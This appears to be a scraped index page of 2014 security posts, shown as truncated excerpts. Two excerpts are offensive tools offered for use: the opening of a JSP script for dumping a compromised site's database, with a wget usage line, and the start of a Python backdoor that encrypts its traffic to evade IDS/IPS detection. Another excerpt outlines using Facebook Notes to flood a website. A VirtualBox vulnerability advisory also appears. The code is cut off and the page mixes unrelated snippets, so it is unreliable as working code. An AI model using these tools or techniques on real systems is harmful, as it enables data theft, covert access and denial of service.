jsp wget 脱裤脚本,拖数据库脚本

jsp wget脱裤脚本 Gavin | 2014-05-20 17:27 刚刚和朋友看了下jsp也可以实现 <%@ page contentType="text/html; charset=utf-8" %> <%@ page language="java" %> <%@ page import="java.sql.*" %> <% //author: By Gavin //Usage: wget "http://xxx.com/wget_db.jsp?sn=0&en=5000000&ln=50000" -O gavin.sql out.clear(); //分段每次limit查询出来的条数

Information on recently-fixed Oracle VM VirtualBox vulnerabilities

Information on recently-fixed Oracle VM VirtualBox vulnerabilities From: Matthew Daley <mattd () bugfuzz com> Date: Fri, 07 Feb 2014 15:27:39 +1300 Hi there, Recently I found a few vulnerabilities in Oracle VM VirtualBox, the open-source virtualization product. These have already been reported to the project, fixed and disclosed in the form of the recent January 2014 Oracle Critical Patch Update (at <http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html>). The purpose of this mail is simply to provide a few more specifics about each vulnerability to allow distributors, packagers and other users of the software to better classify them (and, of course, for the sake of freely sharing information!

python加密通讯后门

加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的,简单的demo。 client.py # client import socket import time import binascii import base64 import pyDes import sys #use des iv = '2132435465768797' key = 'aa000000000000000000000002200000000000aa0000000d' #data = "afuckfucdfadf" #des def encrypt(iv,

Using Facebook Notes to DDoS any website

Facebook Notes allows users to include <img> tags. Whenever a <img> tag is used, Facebook crawls the image from the external server and caches it. Facebook will only cache the image once however using random get parameters the cache can be by-passed and the feature can be abused to cause a huge HTTP GET flood. Steps to re-create the bug as reported to Facebook Bug Bounty on March 03, 2014.